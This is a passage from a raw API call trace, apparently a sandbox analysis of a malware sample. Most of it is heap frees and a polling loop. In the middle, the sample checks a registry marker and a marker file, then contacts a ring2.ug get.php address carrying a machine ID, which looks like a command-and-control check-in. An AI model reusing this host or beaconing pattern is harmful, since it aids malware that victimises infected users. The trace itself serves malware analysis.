lpMem=0x3445510 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3445d78 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3440928 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34411b0 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34465e0 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3446e28 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3441a38 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34422c0 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3447688 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3447f10 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3448798 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3449020 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34498a8 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344a130 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344a9b8 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344b240 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3457670 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3457ed8 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344bac8 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344c350 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344cbd8 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3458740 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3458f88 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344d460 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344dce8 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344e570 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344edf8 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344f680 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x344ff08 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3450790 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3451018 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34518a0 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34597d0 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345a038 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3452128 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34529b0 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3453238 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345a8a0 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3453ac0 | out: hHeap=0x620000) returned 1 [0246.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3454348 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3454bd0 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3455458 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3455ce0 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3456568 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345b100 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345b988 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345c210 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345ca98 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346b0e8 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346b950 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345d320 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345dba8 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345e430 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345ecb8 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345f540 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x345fdc8 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3460650 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3460ed8 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3461760 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34177c0 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342d830 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673dc0 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340bff0 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343c4e8 | out: hHeap=0x620000) returned 1 [0246.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342c7c8 | out: hHeap=0x620000) returned 1 [0246.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3416ec8 | out: hHeap=0x620000) returned 1 [0246.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x641888 | out: hHeap=0x620000) returned 1 [0246.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x640528 | out: hHeap=0x620000) returned 1 [0246.957] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f3fc | out: phModule=0x18f3fc) returned 0 [0246.957] ExitProcess (uExitCode=0x0) [0246.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63f0e0 | out: hHeap=0x620000) returned 1 [0247.033] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 53 os_tid = 0x750 Thread: id = 54 os_tid = 0x7d8 Thread: id = 55 os_tid = 0x7f8 Thread: id = 56 os_tid = 0x130 Thread: id = 57 os_tid = 0x49c Thread: id = 58 os_tid = 0x414 Thread: id = 59 os_tid = 0x40c Thread: id = 99 os_tid = 0x34c Thread: id = 100 os_tid = 0x350 Thread: id = 147 os_tid = 0x318 [0195.869] timeGetTime () returned 0x1137baf [0195.869] GetLastError () returned 0x54f [0195.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x340bff0 [0195.878] GetCurrentThreadId () returned 0x318 [0195.878] SetLastError (dwErrCode=0x54f) [0195.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x9a6a5e4 | out: phkResult=0x9a6a5e4*=0x5b4) returned 0x0 [0195.878] RegQueryValueExW (in: hKey=0x5b4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x9a6a5d8, lpData=0x9a6a5e0, lpcbData=0x9a6a5dc*=0x4 | out: lpType=0x9a6a5d8*=0x4, lpData=0x9a6a5e0*=0x1, lpcbData=0x9a6a5dc*=0x4) returned 0x0 [0195.878] RegCloseKey (hKey=0x5b4) returned 0x0 [0195.917] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9a6a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0195.917] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0195.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x643060 [0195.925] AreFileApisANSI () returned 1 [0195.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a6a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0195.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x679450 [0195.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a6a4e4, cbMultiByte=-1, lpWideCharStr=0x679450, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0195.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9a6a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0195.996] GetLastError () returned 0x2 [0195.997] GetLastError () returned 0x2 [0195.997] SetLastError (dwErrCode=0x2) [0195.997] GetLastError () returned 0x2 [0195.997] SetLastError (dwErrCode=0x2) [0195.997] GetLastError () returned 0x2 [0195.997] SetLastError (dwErrCode=0x2) [0196.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x679450 | out: hHeap=0x620000) returned 1 [0196.006] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0196.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c41e0 | out: hHeap=0x620000) returned 1 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x690248 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x340c3b8 [0196.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x690248, cbMultiByte=-1, lpWideCharStr=0x340c3b8, cchWideChar=1056 | out: lpWideCharStr="490C00C027B159BE46CE14D71389A685") returned 33 [0196.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x340cc00 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340c3b8 | out: hHeap=0x620000) returned 1 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x690248 | out: hHeap=0x620000) returned 1 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x340d458 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340cc00 | out: hHeap=0x620000) returned 1 [0196.008] lstrcpyW (in: lpString1=0x9a6af78, lpString2="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" [0196.008] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0198.316] InternetReadFile (in: hFile=0x0, lpBuffer=0x9a6a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x9a6a604 | out: lpBuffer=0x9a6a778, lpdwNumberOfBytesRead=0x9a6a604) returned 0 [0198.317] InternetCloseHandle (hInternet=0x0) returned 0 [0198.317] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0198.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340d458 | out: hHeap=0x620000) returned 1 [0198.317] timeGetTime () returned 0x1138540 [0198.317] timeGetTime () returned 0x1138540 [0198.317] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0198.317] Sleep (dwMilliseconds=0x64) [0198.424] timeGetTime () returned 0x11385ad [0198.424] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0198.425] Sleep (dwMilliseconds=0x64) [0198.534] timeGetTime () returned 0x113861a [0198.534] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0198.534] Sleep (dwMilliseconds=0x64) [0198.643] timeGetTime () returned 0x1138688 [0198.643] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0198.643] Sleep (dwMilliseconds=0x64) [0198.752] timeGetTime () returned 0x11386f5 [0198.752] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0198.752] Sleep (dwMilliseconds=0x64) [0198.861] timeGetTime () returned 0x1138762 [0198.861] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0198.861] Sleep (dwMilliseconds=0x64) [0198.971] timeGetTime () returned 0x11387cf [0198.971] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0198.971] Sleep (dwMilliseconds=0x64) [0199.080] timeGetTime () returned 0x113883c [0199.080] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.080] Sleep (dwMilliseconds=0x64) [0199.189] timeGetTime () returned 0x11388aa [0199.189] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.189] Sleep (dwMilliseconds=0x64) [0199.298] timeGetTime () returned 0x1138917 [0199.298] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.298] Sleep (dwMilliseconds=0x64) [0199.407] timeGetTime () returned 0x1138984 [0199.408] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.408] Sleep (dwMilliseconds=0x64) [0199.517] timeGetTime () returned 0x11389f1 [0199.517] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.517] Sleep (dwMilliseconds=0x64) [0199.626] timeGetTime () returned 0x1138a5e [0199.626] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.626] Sleep (dwMilliseconds=0x64) [0199.735] timeGetTime () returned 0x1138acc [0199.735] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.735] Sleep (dwMilliseconds=0x64) [0199.844] timeGetTime () returned 0x1138b39 [0199.844] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.844] Sleep (dwMilliseconds=0x64) [0199.953] timeGetTime () returned 0x1138ba6 [0199.953] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0199.954] Sleep (dwMilliseconds=0x64) [0200.063] timeGetTime () returned 0x1138c13 [0200.063] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.063] Sleep (dwMilliseconds=0x64) [0200.172] timeGetTime () returned 0x1138c80 [0200.172] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.172] Sleep (dwMilliseconds=0x64) [0200.281] timeGetTime () returned 0x1138cee [0200.281] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.281] Sleep (dwMilliseconds=0x64) [0200.391] timeGetTime () returned 0x1138d5b [0200.391] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.391] Sleep (dwMilliseconds=0x64) [0200.499] timeGetTime () returned 0x1138dc8 [0200.499] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.500] Sleep (dwMilliseconds=0x64) [0200.612] timeGetTime () returned 0x1138e35 [0200.612] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.612] Sleep (dwMilliseconds=0x64) [0200.718] timeGetTime () returned 0x1138ea2 [0200.718] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.718] Sleep (dwMilliseconds=0x64) [0200.827] timeGetTime () returned 0x1138f10 [0200.827] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.827] Sleep (dwMilliseconds=0x64) [0200.936] timeGetTime () returned 0x1138f7d [0200.936] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0200.936] Sleep (dwMilliseconds=0x64) [0201.045] timeGetTime () returned 0x1138fea [0201.046] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.046] Sleep (dwMilliseconds=0x64) [0201.155] timeGetTime () returned 0x1139057 [0201.155] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.155] Sleep (dwMilliseconds=0x64) [0201.264] timeGetTime () returned 0x11390c4 [0201.264] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.264] Sleep (dwMilliseconds=0x64) [0201.397] timeGetTime () returned 0x1139132 [0201.398] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.398] Sleep (dwMilliseconds=0x64) [0201.498] timeGetTime () returned 0x113919f [0201.498] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.498] Sleep (dwMilliseconds=0x64) [0201.607] timeGetTime () returned 0x113920c [0201.607] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.607] Sleep (dwMilliseconds=0x64) [0201.716] timeGetTime () returned 0x1139279 [0201.716] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.716] Sleep (dwMilliseconds=0x64) [0201.825] timeGetTime () returned 0x11392e6 [0201.826] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.826] Sleep (dwMilliseconds=0x64) [0201.935] timeGetTime () returned 0x1139354 [0201.935] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0201.935] Sleep (dwMilliseconds=0x64) [0202.044] timeGetTime () returned 0x11393c1 [0202.044] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.044] Sleep (dwMilliseconds=0x64) [0202.154] timeGetTime () returned 0x113942e [0202.154] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.154] Sleep (dwMilliseconds=0x64) [0202.262] timeGetTime () returned 0x113949b [0202.262] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.262] Sleep (dwMilliseconds=0x64) [0202.371] timeGetTime () returned 0x1139508 [0202.371] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.372] Sleep (dwMilliseconds=0x64) [0202.481] timeGetTime () returned 0x1139576 [0202.481] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.481] Sleep (dwMilliseconds=0x64) [0202.590] timeGetTime () returned 0x11395e3 [0202.590] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.590] Sleep (dwMilliseconds=0x64) [0202.699] timeGetTime () returned 0x1139650 [0202.699] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.699] Sleep (dwMilliseconds=0x64) [0202.809] timeGetTime () returned 0x11396bd [0202.809] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.809] Sleep (dwMilliseconds=0x64) [0202.917] timeGetTime () returned 0x113972a [0202.917] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0202.918] Sleep (dwMilliseconds=0x64) [0203.027] timeGetTime () returned 0x1139798 [0203.027] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0203.027] Sleep (dwMilliseconds=0x64) [0203.136] timeGetTime () returned 0x1139805 [0203.136] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0203.136] Sleep (dwMilliseconds=0x64) [0203.257] timeGetTime () returned 0x1139872 [0203.257] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0203.257] Sleep (dwMilliseconds=0x64) [0203.356] timeGetTime () returned 0x11398df [0203.362] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9a6a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0203.362] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") 